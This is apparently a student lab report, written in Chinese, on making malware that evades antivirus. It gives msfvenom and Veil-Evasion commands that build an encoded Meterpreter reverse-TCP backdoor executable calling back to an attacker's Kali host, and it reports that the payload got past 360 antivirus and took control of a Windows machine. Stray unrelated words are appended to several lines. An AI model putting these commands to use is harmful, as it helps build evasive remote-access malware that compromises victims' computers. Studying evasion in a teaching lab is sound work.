(1)理解免殺技術原理python
(2)正確使用msf編碼器,veil-evasion,本身利用shellcode編程等免殺工具或技巧;shell
(3)經過組合應用各類技術實現惡意代碼免殺編程
(4)用另外一電腦實測,在殺軟開啓的狀況下,可運行並回連成功,註明電腦的殺軟名稱與版本windows
(1)殺軟是如何檢測出惡意代碼的?數組
(2)免殺是作什麼?安全
(3)免殺的基本方法有哪些?網絡
有18個殺毒軟件查出來了。掃描結果:46%的殺軟(18/39)報告發現病毒tcp
Kali輸入命令工具
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=kali的IP LPORT=5324端口號 -f exe >本身起後門名字.exe
再次學習
在Kali中安裝veil,sudo apt-get install veil
Veil-Evasion
veil
,後在veil
中輸入命令use evasion
use python/meterpreter/rev_tcp.py(設置payload)
set LHOST Kali的IP(設置反彈鏈接IP)
set LPORT 端口號(設置反彈端口)
generate 可執行文件名
選擇使用語言來編寫
按照上次實驗用過的msf監聽方法在Kali上打開監聽,在Win主機開啓殺軟(Win安裝360 )的狀況下,運行最後生成的優化版exe文件,Kali成功獲取了Win主機的權限
經過本次實驗讓我進一步瞭解了病毒的可怕,居然都能經過360的檢查,真是太恐怖了。仍是本身作的頗有成就感!但願在之後的學習中可以更多的學到這些知識。